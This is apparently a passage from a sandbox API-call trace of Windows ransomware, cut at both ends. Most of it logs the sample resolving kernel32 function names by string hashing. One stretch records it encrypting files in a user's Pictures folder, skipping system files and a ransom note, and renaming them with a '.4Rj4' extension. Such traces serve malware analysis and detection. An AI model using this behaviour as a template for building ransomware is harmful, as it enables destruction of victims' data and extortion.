returned="CreateWaitableTimerExW" [0086.163] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.163] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.163] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.163] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.163] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.163] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.163] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.163] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.164] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.164] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.164] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.164] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.164] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.164] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.164] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.164] lstrlenA (lpString="DELETEATOM") returned 10 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.164] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.164] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.164] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.164] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.164] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.164] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.164] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.164] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.164] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.164] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.164] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.165] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.165] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.165] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.165] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.165] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.165] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.165] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.165] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.165] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.165] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.165] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.165] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.165] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.165] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.165] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.165] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.165] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.165] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.166] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.166] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.166] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.166] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.166] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.166] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.166] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.166] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.166] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.166] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.166] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.166] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.166] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png") returned 63 [0086.166] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png.4Rj4") returned 68 [0086.167] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\avtmz-q0lnqqwl.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png.4Rj4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\avtmz-q0lnqqwl.png.4rj4"), dwFlags=0x0) returned 1 [0086.167] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.167] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.168] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.168] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf840f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf840f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0086.168] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0086.168] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7497360, ftCreationTime.dwHighDateTime=0x1d4d593, ftLastAccessTime.dwLowDateTime=0x4ee35880, ftLastAccessTime.dwHighDateTime=0x1d4cd10, ftLastWriteTime.dwLowDateTime=0x4ee35880, ftLastWriteTime.dwHighDateTime=0x1d4cd10, nFileSizeHigh=0x0, nFileSizeLow=0xa58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="FcUVZVQezWKj.gif", cAlternateFileName="FCUVZV~1.GIF")) returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="autorun.inf") returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="boot.ini") returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="desktop.ini") returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="ntuser.dat") returned -1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="iconcache.db") returned -1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="bootsect.bak") returned 1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="ntuser.dat.log") returned -1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="thumbs.db") returned -1 [0086.168] lstrcmpiW (lpString1="FcUVZVQezWKj.gif", lpString2="Bootfont.bin") returned 1 [0086.168] lstrlenW (lpString="FcUVZVQezWKj.gif") returned 16 [0086.168] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.168] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.168] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.168] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.168] lstrlenW (lpString="FcUVZVQezWKj.gif") returned 16 [0086.168] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.168] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="FcUVZVQezWKj.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif" [0086.168] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\fcuvzvqezwkj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.169] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=42379) returned 1 [0086.169] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.169] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.169] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.169] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.169] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.170] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.170] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.171] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.171] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.172] CloseHandle (hObject=0x42c) returned 1 [0086.172] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.172] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.173] CloseHandle (hObject=0x0) returned 0 [0086.173] CloseHandle (hObject=0x428) returned 1 [0086.173] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.173] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.173] GetTickCount () returned 0x114dff4 [0086.174] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.174] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.174] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.174] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.174] lstrlenA (lpString="kernel32.dll") returned 12 [0086.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.175] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.175] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.175] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.175] lstrlenA (lpString="ADDATOMA") returned 8 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.175] lstrlenA (lpString="ADDATOMW") returned 8 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.175] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.175] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.175] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.175] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.175] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.175] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.175] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.175] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.175] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.175] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.175] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.175] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.175] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.175] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.176] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.176] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.176] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.176] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.176] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.176] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.176] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.176] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.176] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.176] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.176] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.176] lstrlenA 